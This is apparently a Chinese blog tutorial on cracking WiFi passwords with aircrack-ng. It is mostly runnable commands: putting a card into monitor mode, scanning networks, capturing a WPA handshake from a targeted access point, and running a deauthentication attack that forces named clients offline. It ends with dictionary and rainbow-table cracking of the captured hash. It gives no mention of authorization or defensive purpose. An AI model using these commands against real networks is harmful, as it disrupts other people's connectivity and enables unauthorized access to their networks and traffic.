使用aircrack-ng破解wifi密码

一、准备阶段

首先需要一个kali系统和一块支持混杂模式的无线网卡,嫌麻烦的可以下载live版:https://www.kali.org/get-kali/#kali-live,然后通过USBWriter将iso映像写入不用的u盘(注意会将u盘里的内容全部清空)

  1. 查看网卡
ifconfig -a
  1. 杀死多余进程
sudo airmon-ng check kill
  1. 开启监听模式
sudo airmon-ng start wlan0

二、扫描阶段

  1. 普通频段
sudo airodump-ng wlan0mon

# 过滤未连接的客户端
sudo airodump-ng wlan0mon -a
  1. 5G频段
sudo airodump-ng -C 5180-5885 wlan0mon

注:
(1) 交互
a 切换显示内容
s 切换排序列
空格 暂停/恢复屏幕刷新

三、抓包阶段

  1. 监听特定网络
sudo airodump-ng -c <信道> --bssid <AP的mac地址> -w <要保存到的文件名> wlan0mon

例:

sudo airodump-ng -c 6 --bssid 14:75:90:41:55:AE -w abc wlan0mon

注:
(1) 后台监听

nohup <命令> > /dev/null 2>&1 &

例:

nohup sudo airodump-ng -c 6 --bssid 14:75:90:41:55:AE -w abc wlan0mon > /dev/null 2>&1 &
  1. 攻击特定网络使其掉线
sudo aireplay-ng -0(DeAuth攻击) <攻击次数> -a <AP的mac地址> -c <攻击某个指定的客户端mac地址> wlan0mon

例:

sudo aireplay-ng -0 10 -a 14:75:90:41:55:AE -c EC:51:BC:FD:57:23 wlan0mon

注:
(1) 还可以试试攻击AP,即:没有-c参数
(2) 查看客户端地址macchanger --show wlan0mon

四、Hash爆破

  1. 查看握手包情况
aircrack-ng <握手包>  # 或者用EWSA
  1. 用字典破解
aircrack-ng -a2 -b <AP的mac> -w <字典> <握手包>
  1. 制作彩虹表破解(可选)
airolib-ng <创建的数据库名称> --import essid <包含essid的文件,可包含多个>
airolib-ng <创建的数据库名称> --import passwd <字典>
airolib-ng <创建的数据库名称> --batch
aircrack-ng -r <创建的数据库名称> -e <AP的essid> <握手包>
  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值